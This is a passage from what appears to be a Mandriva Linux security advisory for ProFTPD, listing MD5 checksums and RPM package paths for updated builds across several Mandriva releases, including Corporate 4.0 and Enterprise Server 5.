\r\n2009.0/i586/proftpd-mod_sql_mysql-1.3.2-0.4mdv2009.0.i586.rpm\r\n 65ebb5ae1dd0fe2bf6e071710b315a30 \r\n2009.0/i586/proftpd-mod_sql_postgres-1.3.2-0.4mdv2009.0.i586.rpm\r\n 8d3b2b44fc29d56ee242f51ac93dc213 2009.0/i586/proftpd-mod_time-1.3.2-0.4mdv2009.0.i586.rpm\r\n 501b5b2c6059faac9683694c3384178c 2009.0/i586/proftpd-mod_tls-1.3.2-0.4mdv2009.0.i586.rpm\r\n d6c97e71ff49a2b7dd929aadaf3466e5 2009.0/i586/proftpd-mod_vroot-1.3.2-0.4mdv2009.0.i586.rpm\r\n 3ef668192f5eb8cc70f73fd57201ad2c 2009.0/i586/proftpd-mod_wrap-1.3.2-0.4mdv2009.0.i586.rpm\r\n c0ad3e7895969c4916f28dc7a3608ef6 \r\n2009.0/i586/proftpd-mod_wrap_file-1.3.2-0.4mdv2009.0.i586.rpm\r\n 6f1e9dadb14097d8bfeb7d14792c0479 \r\n2009.0/i586/proftpd-mod_wrap_sql-1.3.2-0.4mdv2009.0.i586.rpm \r\n 0f6e22b3adcf88267b8fbf15668afa0d 2009.0/SRPMS/proftpd-1.3.2-0.4mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n c9b4d50d5a3ff5c013a70785fb4258d2 2009.0/x86_64/proftpd-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 3584b5ab5c8728eb27a836892e7ea0af 2009.0/x86_64/proftpd-devel-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 74067ff8d5530b1b2c5e69baf2be5375 \r\n2009.0/x86_64/proftpd-mod_autohost-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 4c7fd07706e6ab6ad7b54d81789fb6e1 \r\n2009.0/x86_64/proftpd-mod_ban-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 020fbc17086a7642aaa84f9657112c4e \r\n2009.0/x86_64/proftpd-mod_case-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 37b4bdec8986a9d8af210e06099994fc \r\n2009.0/x86_64/proftpd-mod_ctrls_admin-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n eefd827450b1f3af88337f5c08c1f6ed \r\n2009.0/x86_64/proftpd-mod_gss-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n b39db476e2ecd6c5fa603798d4aabccb \r\n2009.0/x86_64/proftpd-mod_ifsession-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 46523c1f5436831af6c037f008f5ba72 \r\n2009.0/x86_64/proftpd-mod_ldap-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 40330e9dfdc9b2e773e7353cb2e2f36f \r\n2009.0/x86_64/proftpd-mod_load-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 42ce8fb4c386c73333f2001d1b1ab4c1 \r\n2009.0/x86_64/proftpd-mod_quotatab-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n fd0dd14ae0041bc910f66d93480f8060 \r\n2009.0/x86_64/proftpd-mod_quotatab_file-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 9ba237bcd93e6aa97f55473b0d9ffc78 \r\n2009.0/x86_64/proftpd-mod_quotatab_ldap-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 9d4b084261a47bc27d51ac4457be39cd \r\n2009.0/x86_64/proftpd-mod_quotatab_radius-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n ba1cc158630d79ea09c3ee1398015957 \r\n2009.0/x86_64/proftpd-mod_quotatab_sql-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 71cf8f4cb0bb8494acdfb232525a3f8e \r\n2009.0/x86_64/proftpd-mod_radius-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 2ca1189c3e366445ae3d5fe2763c0ca1 \r\n2009.0/x86_64/proftpd-mod_ratio-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 3db0175d5fbe98e67abe906f6c2fb607 \r\n2009.0/x86_64/proftpd-mod_rewrite-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 499aa6ad8fcf46c343bd9f20e102e47b \r\n2009.0/x86_64/proftpd-mod_shaper-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 4e1fb4f9fea8e037076ce3b95af0a920 \r\n2009.0/x86_64/proftpd-mod_site_misc-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 5b99600fa7545b5823f0fa0ddb7a38c5 \r\n2009.0/x86_64/proftpd-mod_sql-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 80ee086eac0082c0dda122535d72db1d \r\n2009.0/x86_64/proftpd-mod_sql_mysql-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 328de69a89a3f77ac02bc6be05a776a1 \r\n2009.0/x86_64/proftpd-mod_sql_postgres-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 4105f8f544588f6b13a70aad0e6f444c \r\n2009.0/x86_64/proftpd-mod_time-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n b9db4c4adc4c3054b37235f5ed7795d7 \r\n2009.0/x86_64/proftpd-mod_tls-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 62a356a3a857809a1a376dd07ff353d2 \r\n2009.0/x86_64/proftpd-mod_vroot-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 0c4cc4ad51deef7f83bace6cef2185bb \r\n2009.0/x86_64/proftpd-mod_wrap-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 6699773ed14dc1c92fc57f2db8102f9b \r\n2009.0/x86_64/proftpd-mod_wrap_file-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 2e297598198d71f64e81c8a658c989e1 \r\n2009.0/x86_64/proftpd-mod_wrap_sql-1.3.2-0.4mdv2009.0.x86_64.rpm \r\n 0f6e22b3adcf88267b8fbf15668afa0d 2009.0/SRPMS/proftpd-1.3.2-0.4mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n aed71239960bf7aba5f7e757cd19debf 2009.1/i586/proftpd-1.3.2-4.3mdv2009.1.i586.rpm\r\n d49f746c3afc297f28b14f3e0648c257 2009.1/i586/proftpd-devel-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4d9b09d69a738fcbc889ba543ca88e34 \r\n2009.1/i586/proftpd-mod_autohost-1.3.2-4.3mdv2009.1.i586.rpm\r\n b8ef88b8ee4a385fbce227cce1fe3b5c 2009.1/i586/proftpd-mod_ban-1.3.2-4.3mdv2009.1.i586.rpm\r\n 86f0568b160f984cb5da088196079cb4 2009.1/i586/proftpd-mod_case-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4f90e334ee571f25a7dd310cb4c9b0a6 \r\n2009.1/i586/proftpd-mod_ctrls_admin-1.3.2-4.3mdv2009.1.i586.rpm\r\n a5734ea5aa1b96c8f8245810ac837d94 2009.1/i586/proftpd-mod_gss-1.3.2-4.3mdv2009.1.i586.rpm\r\n a8908a6f38c06080079f21616260b5b2 \r\n2009.1/i586/proftpd-mod_ifsession-1.3.2-4.3mdv2009.1.i586.rpm\r\n c88b0e334beb4fb0dd13861cc58f3c0a 2009.1/i586/proftpd-mod_ldap-1.3.2-4.3mdv2009.1.i586.rpm\r\n a7687eb04f0c0bb2c3cccd7e87047b38 2009.1/i586/proftpd-mod_load-1.3.2-4.3mdv2009.1.i586.rpm\r\n 94167be7342868855c34e8a733d6179c \r\n2009.1/i586/proftpd-mod_quotatab-1.3.2-4.3mdv2009.1.i586.rpm\r\n 3d4483dd721b1531443c628bcb51bb87 \r\n2009.1/i586/proftpd-mod_quotatab_file-1.3.2-4.3mdv2009.1.i586.rpm\r\n 5def57fd05b0b6d264c0ff06be3c452e \r\n2009.1/i586/proftpd-mod_quotatab_ldap-1.3.2-4.3mdv2009.1.i586.rpm\r\n be1a11751a260b9485706d025f7b790a \r\n2009.1/i586/proftpd-mod_quotatab_radius-1.3.2-4.3mdv2009.1.i586.rpm\r\n 6bccd6b2703e063a1f868c281af2fb14 \r\n2009.1/i586/proftpd-mod_quotatab_sql-1.3.2-4.3mdv2009.1.i586.rpm\r\n caf0a181179c7e7b0df438145993c260 2009.1/i586/proftpd-mod_radius-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4bfc301f665459020fd01d241418da10 2009.1/i586/proftpd-mod_ratio-1.3.2-4.3mdv2009.1.i586.rpm\r\n e203d54440dc6c63cfa280f4a1645477 \r\n2009.1/i586/proftpd-mod_rewrite-1.3.2-4.3mdv2009.1.i586.rpm\r\n 06bcb89523dcb2834f36363eb951508d 2009.1/i586/proftpd-mod_sftp-1.3.2-4.3mdv2009.1.i586.rpm\r\n 5ad0cdf4611e919be1e40d9dbebf23d0 2009.1/i586/proftpd-mod_shaper-1.3.2-4.3mdv2009.1.i586.rpm\r\n 9510932406f1d51532c0f4628656ae84 \r\n2009.1/i586/proftpd-mod_site_misc-1.3.2-4.3mdv2009.1.i586.rpm\r\n ebf6f6220d9cab6c5b5a288bc956fdd0 2009.1/i586/proftpd-mod_sql-1.3.2-4.3mdv2009.1.i586.rpm\r\n 3aafc84edd0adbcfecb3b6ea02a20bf1 \r\n2009.1/i586/proftpd-mod_sql_mysql-1.3.2-4.3mdv2009.1.i586.rpm\r\n c912e99c6651730738188eb67b5a89e1 \r\n2009.1/i586/proftpd-mod_sql_postgres-1.3.2-4.3mdv2009.1.i586.rpm\r\n 9589a010aed9f23e72ec6db855b184f9 2009.1/i586/proftpd-mod_time-1.3.2-4.3mdv2009.1.i586.rpm\r\n 1eeeda75990735116ab07c674fe2c623 2009.1/i586/proftpd-mod_tls-1.3.2-4.3mdv2009.1.i586.rpm\r\n fce42746d17f5b11c97319591bb9a88f 2009.1/i586/proftpd-mod_vroot-1.3.2-4.3mdv2009.1.i586.rpm\r\n c4b1f7509fedc9b88646fb70adc12b45 2009.1/i586/proftpd-mod_wrap-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4a2b73b02a9c0dcf4e63323d350fa95c \r\n2009.1/i586/proftpd-mod_wrap_file-1.3.2-4.3mdv2009.1.i586.rpm\r\n fb3df7fa8c2c538dd8c613fafc41f1f5 \r\n2009.1/i586/proftpd-mod_wrap_sql-1.3.2-4.3mdv2009.1.i586.rpm \r\n c7a3b4ac2e75e9dfe3912e73bb272fa9 2009.1/SRPMS/proftpd-1.3.2-4.3mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n a6b2830005df037307afb5b825511861 2009.1/x86_64/proftpd-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n af595e88d9ba8dc6cbcacf27ca1dbcc2 2009.1/x86_64/proftpd-devel-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 9735071e01d2392cd1f59d3e02395d63 \r\n2009.1/x86_64/proftpd-mod_autohost-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 916358bef91a16077806c86de9d1efd9 \r\n2009.1/x86_64/proftpd-mod_ban-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n d53d77569fe4ce057db0a35b03fa0ca7 \r\n2009.1/x86_64/proftpd-mod_case-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n f56dee8296e1593141844dc73ad3df37 \r\n2009.1/x86_64/proftpd-mod_ctrls_admin-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 37350fff9604f97a4e1c26b32be76c8e \r\n2009.1/x86_64/proftpd-mod_gss-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 7ba0e7dcc812128665960b490e4b3c1d \r\n2009.1/x86_64/proftpd-mod_ifsession-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 907665b726396f366b60aed937978731 \r\n2009.1/x86_64/proftpd-mod_ldap-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 4beaa5f007e4c39c26dc16832b57951f \r\n2009.1/x86_64/proftpd-mod_load-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n b420a6fd444b76842810fd9b82d11792 \r\n2009.1/x86_64/proftpd-mod_quotatab-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 919fc5751a1aded6c19f8fadfbb5847b \r\n2009.1/x86_64/proftpd-mod_quotatab_file-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n dbce5c8d0805f9af94c19fb4087084db \r\n2009.1/x86_64/proftpd-mod_quotatab_ldap-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 00fda6395cf2653bd5db8dc9baef0314 \r\n2009.1/x86_64/proftpd-mod_quotatab_radius-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n d575efa232443920270251bf28ec8d87 \r\n2009.1/x86_64/proftpd-mod_quotatab_sql-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 6ca6948f914c39bca76d3e0b2a0e0491 \r\n2009.1/x86_64/proftpd-mod_radius-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n e60d42f42db99fdc70a5c559a8798f32 \r\n2009.1/x86_64/proftpd-mod_ratio-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 500e7d59b18e03ce2d1d646faec35df0 \r\n2009.1/x86_64/proftpd-mod_rewrite-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n d42351a95a97e208c26a73500e586964 \r\n2009.1/x86_64/proftpd-mod_sftp-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 2b57a3244903b09e30dd501e4e23bddc \r\n2009.1/x86_64/proftpd-mod_shaper-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n bc1c1edc3ac9df62ad6ffed6f177031b \r\n2009.1/x86_64/proftpd-mod_site_misc-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n cf2362de6b2c03fcfdab454abc6250d6 \r\n2009.1/x86_64/proftpd-mod_sql-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 11579dca45c5262109f6dd5eeb102248 \r\n2009.1/x86_64/proftpd-mod_sql_mysql-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 5e042bbd8d138e0384415ea1f7d8c987 \r\n2009.1/x86_64/proftpd-mod_sql_postgres-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n bb8d509fa422b044fa7c0a54f772e828 \r\n2009.1/x86_64/proftpd-mod_time-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n f0ac0f2b95b20a6d94563bb3b795b631 \r\n2009.1/x86_64/proftpd-mod_tls-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 2d84e91e39cdb70dfa99f506ea1c149f \r\n2009.1/x86_64/proftpd-mod_vroot-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 541d2cc751afa34051d9b7e0ffc77867 \r\n2009.1/x86_64/proftpd-mod_wrap-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n a031f41be3c2bbf19b2ad87aa723afec \r\n2009.1/x86_64/proftpd-mod_wrap_file-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n b9d6b63bd48b9ea2fb08dbf1f53cc452 \r\n2009.1/x86_64/proftpd-mod_wrap_sql-1.3.2-4.3mdv2009.1.x86_64.rpm \r\n c7a3b4ac2e75e9dfe3912e73bb272fa9 2009.1/SRPMS/proftpd-1.3.2-4.3mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n dd848a74a6324fe3e4887ffd8f7a0947 2010.0/i586/proftpd-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 46541f77ec1d551384434303c9d771fd 2010.0/i586/proftpd-devel-1.3.2b-1.2mdv2010.0.i586.rpm\r\n affa6d8649ff49826359525e5e3c3bc3 \r\n2010.0/i586/proftpd-mod_autohost-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 34ab986bd1bd58d64a76474dcce4024d 2010.0/i586/proftpd-mod_ban-1.3.2b-1.2mdv2010.0.i586.rpm\r\n c05796ea6a65e0254e1c2a59d0cde26a 2010.0/i586/proftpd-mod_case-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 2fde4f8529ad42e6543dc394eb37a6a8 \r\n2010.0/i586/proftpd-mod_ctrls_admin-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 2bea60920c8e153bd1a06d66c116b385 2010.0/i586/proftpd-mod_gss-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 7c28ba2a2ee6264b0f1e904946027ed3 \r\n2010.0/i586/proftpd-mod_ifsession-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 113fb3cdd9ca077d0fad2bf161eb33a1 2010.0/i586/proftpd-mod_ldap-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 218d363874a9aaab6110a7a71f27c75e 2010.0/i586/proftpd-mod_load-1.3.2b-1.2mdv2010.0.i586.rpm\r\n a14950554085fb3ac61e1f4e130ef106 \r\n2010.0/i586/proftpd-mod_quotatab-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 8869ae8cbda130c213eac45431574ec6 \r\n2010.0/i586/proftpd-mod_quotatab_file-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 18a141a036989e9d2ba2b721ea3d96b9 \r\n2010.0/i586/proftpd-mod_quotatab_ldap-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 9c375770f082cd7f50f57ed3b8cfe18e \r\n2010.0/i586/proftpd-mod_quotatab_radius-1.3.2b-1.2mdv2010.0.i586.rpm\r\n ee252f0c88ee6095f8bc4b274524b4a5 \r\n2010.0/i586/proftpd-mod_quotatab_sql-1.3.2b-1.2mdv2010.0.i586.rpm\r\n fd8a104edd647e59433b0c2c1e442cbb \r\n2010.0/i586/proftpd-mod_radius-1.3.2b-1.2mdv2010.0.i586.rpm\r\n f8ba2195c779a419dd7d98265b9adf72 2010.0/i586/proftpd-mod_ratio-1.3.2b-1.2mdv2010.0.i586.rpm\r\n cb326955ce385af35b2d47a536ea295a \r\n2010.0/i586/proftpd-mod_rewrite-1.3.2b-1.2mdv2010.0.i586.rpm\r\n dac761ac2c329edb8063ef4042623b1c 2010.0/i586/proftpd-mod_sftp-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 05b65a6650d0e403a6ca311d0738e1b0 \r\n2010.0/i586/proftpd-mod_shaper-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 64bb01402af73cfae14e3d817ec0054b \r\n2010.0/i586/proftpd-mod_site_misc-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 5fa7191a640c5a7ce6e85cd507c4f2e5 2010.0/i586/proftpd-mod_sql-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 652d750f6cab24c68a1befab39687f76 \r\n2010.0/i586/proftpd-mod_sql_mysql-1.3.2b-1.2mdv2010.0.i586.rpm\r\n aad34f7718fdfb07e0094389527916c0 \r\n2010.0/i586/proftpd-mod_sql_postgres-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 80515fe8363c5cce8b5a612ca212e8ee 2010.0/i586/proftpd-mod_time-1.3.2b-1.2mdv2010.0.i586.rpm\r\n f7ea09c7b36a478d23834fb682383306 2010.0/i586/proftpd-mod_tls-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 36de8f7fda7d9f1337db55f214b07c00 2010.0/i586/proftpd-mod_vroot-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 275e5015b8ddd2a9acb0df46e8916bb1 2010.0/i586/proftpd-mod_wrap-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 85997703010f8bb600924a1fbe8a12a5 \r\n2010.0/i586/proftpd-mod_wrap_file-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 9f56cf0f821f549eed1fd3a171de5369 \r\n2010.0/i586/proftpd-mod_wrap_sql-1.3.2b-1.2mdv2010.0.i586.rpm \r\n 58436f06fb26948305063a45e78bcbd7 2010.0/SRPMS/proftpd-1.3.2b-1.2mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n f1c0704dbc0a1a60e14d3fb9c4a99be6 2010.0/x86_64/proftpd-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n ab73990c06fa7c5413b16a6b5d7a573c 2010.0/x86_64/proftpd-devel-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 643770bc38a29e4ebd038e7f2e69aa82 \r\n2010.0/x86_64/proftpd-mod_autohost-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 0fd5d618b8b25caace31730e91b6b89b \r\n2010.0/x86_64/proftpd-mod_ban-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 84c0d0270036098e030c7894b8941b18 \r\n2010.0/x86_64/proftpd-mod_case-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 172d49b23d21a0634a8706455b0b6c2f \r\n2010.0/x86_64/proftpd-mod_ctrls_admin-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 054138333a930839693096e41008d3d2 \r\n2010.0/x86_64/proftpd-mod_gss-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 29743fe4a50c4f203bcd36959bcda682 \r\n2010.0/x86_64/proftpd-mod_ifsession-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 7d3279d6b591d646b41239ec3100043a \r\n2010.0/x86_64/proftpd-mod_ldap-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 3d511ac9140ca7ef3fa60baed95afd8f \r\n2010.0/x86_64/proftpd-mod_load-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n f6e31dda4763bb5025805600039da742 \r\n2010.0/x86_64/proftpd-mod_quotatab-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 14064603c7cd05a8fb795a5001170128 \r\n2010.0/x86_64/proftpd-mod_quotatab_file-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 3d50ae2c6d617ed9e44b360a049364a4 \r\n2010.0/x86_64/proftpd-mod_quotatab_ldap-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 2ac18660eaf6d93a86acbf8f95b7c875 \r\n2010.0/x86_64/proftpd-mod_quotatab_radius-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 4336bcc4b91e4be399128ccf9f951147 \r\n2010.0/x86_64/proftpd-mod_quotatab_sql-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 152eeb85deb93868890388677b0682f8 \r\n2010.0/x86_64/proftpd-mod_radius-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 572f38135ba48c45ec34d3f745d847ca \r\n2010.0/x86_64/proftpd-mod_ratio-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 12b4d2342f57f486f9859b58bd949006 \r\n2010.0/x86_64/proftpd-mod_rewrite-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 6ed0182708abfde9a07018edef86f50e \r\n2010.0/x86_64/proftpd-mod_sftp-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 45df194fc6aa7b0399bd671b0075a8c8 \r\n2010.0/x86_64/proftpd-mod_shaper-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 566d8a8d28ac8e3a8f17144b6264e150 \r\n2010.0/x86_64/proftpd-mod_site_misc-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 3c1c7f67320e45cc2abfac83882ebd7c \r\n2010.0/x86_64/proftpd-mod_sql-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n ee6e76d8c5c9dee971e718e06f3289e4 \r\n2010.0/x86_64/proftpd-mod_sql_mysql-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n b4a54dd69f873cd05bbf51f17def15fc \r\n2010.0/x86_64/proftpd-mod_sql_postgres-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 669bf78b41fbb88407b577303e1882d3 \r\n2010.0/x86_64/proftpd-mod_time-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n e30a73829fc8be2bc42324abdcd39eef \r\n2010.0/x86_64/proftpd-mod_tls-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n a758dad6d4dd6b081d73606c92491cf5 \r\n2010.0/x86_64/proftpd-mod_vroot-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n ffe3b49a7437603bfe7306a2b768dd84 \r\n2010.0/x86_64/proftpd-mod_wrap-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 08799784805658560301aa693f5ac870 \r\n2010.0/x86_64/proftpd-mod_wrap_file-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n b5c8299cfab2810dc0815bb075ce94d5 \r\n2010.0/x86_64/proftpd-mod_wrap_sql-1.3.2b-1.2mdv2010.0.x86_64.rpm \r\n 58436f06fb26948305063a45e78bcbd7 2010.0/SRPMS/proftpd-1.3.2b-1.2mdv2010.0.src.rpm\r\n\r\n Corporate 4.0:\r\n 9e3c2dad7e39f57a136edacdda8ba9cd corporate/4.0/i586/proftpd-1.3.2-0.4.20060mlcs4.i586.rpm\r\n 110df4bcd0dee71f075376bb19ef1097 \r\ncorporate/4.0/i586/proftpd-anonymous-1.3.2-0.4.20060mlcs4.i586.rpm \r\n b360f33279447f5893702533394169ae corporate/4.0/SRPMS/proftpd-1.3.2-0.4.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 0ad472dfac3bd614b0be3dcfeac2a1f1 \r\ncorporate/4.0/x86_64/proftpd-1.3.2-0.4.20060mlcs4.x86_64.rpm\r\n b254e9c733d69fc628e6bfc2b3c7f65c \r\ncorporate/4.0/x86_64/proftpd-anonymous-1.3.2-0.4.20060mlcs4.x86_64.rpm \r\n b360f33279447f5893702533394169ae corporate/4.0/SRPMS/proftpd-1.3.2-0.4.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 5b2e8c71ac240f80a4039fb3d00fa37e mes5/i586/proftpd-1.3.2-0.4mdvmes5.i586.rpm\r\n ef09730e96320171b4de114c4d72d359 mes5/i586/proftpd-devel-1.3.2-0.4mdvmes5.i586.rpm\r\n 998850de820e66e1d2fc65ca549e9f32 mes5/i586/proftpd-mod_autohost-1.3.2-0.4mdvmes5.i586.rpm\r\n 2bd18082feea9388ac5e8c67472976eb mes5/i586/proftpd-mod_ban-1.3.2-0.4mdvmes5.i586.rpm\r\n a2bde579998df96473ca81f807a9c9f8 mes5/i586/proftpd-mod_case-1.3.2-0.4mdvmes5.i586.rpm\r\n 76dd97730a1b1ba5309f90f34fbc03db \r\nmes5/i586/proftpd-mod_ctrls_admin-1.3.2-0.4mdvmes5.i586.rpm\r\n e2134d16144cd7547a0dc8971e1a3060 mes5/i586/proftpd-mod_gss-1.3.2-0.4mdvmes5.i586.rpm\r\n a5671b83d898fbf1dd0ce51de25bf12d mes5/i586/proftpd-mod_ifsession-1.3.2-0.4mdvmes5.i586.rpm\r\n 22c6dfc8dfca54756a45e2dee109baee mes5/i586/proftpd-mod_ldap-1.3.2-0.4mdvmes5.i586.rpm\r\n 89f4a985b0ebb8fba1edbf55978bf9fe mes5/i586/proftpd-mod_load-1.3.2-0.4mdvmes5.i586.rpm\r\n a777590d5a343fb3a740aed759213a1d mes5/i586/proftpd-mod_quotatab-1.3.2-0.4mdvmes5.i586.rpm\r\n cdd5769777d519e277372332255dfc34 \r\nmes5/i586/proftpd-mod_quotatab_file-1.3.2-0.4mdvmes5.i586.rpm\r\n 141f0e25185f09587b04189adfe479db \r\nmes5/i586/proftpd-mod_quotatab_ldap-1.3.2-0.4mdvmes5.i586.rpm\r\n e0c1b91d7620873739dca6b6a43e6cb2 \r\nmes5/i586/proftpd-mod_quotatab_radius-1.3.2-0.4mdvmes5.i586.rpm\r\n 6ce076f23e5c7945bb249df74d4f2c42 \r\nmes5/i586/proftpd-mod_quotatab_sql-1.3.2-0.4mdvmes5.i586.rpm\r\n 3d6d02f7b0fda8c5eca95e5e0ed247bf mes5/i586/proftpd-mod_radius-1.3.2-0.4mdvmes5.i586.rpm\r\n 5897cc00855488396715caf933c857fe mes5/i586/proftpd-mod_ratio-1.3.2-0.4mdvmes5.i586.rpm\r\n f7c174e7148559a4be61441b09e72ba0 mes5/i586/proftpd-mod_rewrite-1.3.2-0.4mdvmes5.i586.rpm\r\n da4438f1f256f135f24640ade3a8f405 mes5/i586/proftpd-mod_shaper-1.3.2-0.4mdvmes5.i586.rpm\r\n ee70e402b63828087410961276ee6951 mes5/i586/proftpd-mod_site_misc-1.3.2-0.4mdvmes5.i586.rpm\r\n e2b5308857b74c730766ad5f1c7a2b2d mes5/i586/proftpd-mod_sql-1.3.2-0.4mdvmes5.i586.rpm\r\n d0d26f533cfdb59f012e3df0ff9f04b4 mes5/i586/proftpd-mod_sql_mysql-1.3.2-0.4mdvmes5.i586.rpm\r\n e0a76adf230b1146d44eb74f37326ccc \r\nmes5/i586/proftpd-mod_sql_postgres-1.3.2-0.4mdvmes5.i586.rpm\r\n f6286dfd897db61b472cf01ffeae9e23 mes5/i586/proftpd-mod_time-1.3.2-0.4mdvmes5.i586.rpm\r\n ef2583ddfcdb088f85248fc8e6b32740 mes5/i586/proftpd-mod_tls-1.3.2-0.4mdvmes5.i586.rpm\r\n 0476cf42ec380dc6689fc6df39766b17 mes5/i586/proftpd-mod_vroot-1.3.2-0.4mdvmes5.i586.rpm\r\n 9c681f81c7ff35bfaf0bcfb1c7982b45 mes5/i586/proftpd-mod_wrap-1.3.2-0.4mdvmes5.i586.rpm\r\n 47bba96722c5c17a34fe8329678b02cf mes5/i586/proftpd-mod_wrap_file-1.3.2-0.4mdvmes5.i586.rpm\r\n dadc6c23d5f0807db849ed92781ba94c mes5/i586/proftpd-mod_wrap_sql-1.3.2-0.4mdvmes5.i586.rpm \r\n 096a513d6a8b30b1a35e6fe1db6e502e mes5/SRPMS/proftpd-1.3.2-0.4mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n b120272b49c4e02b9108c0163dc9aa13 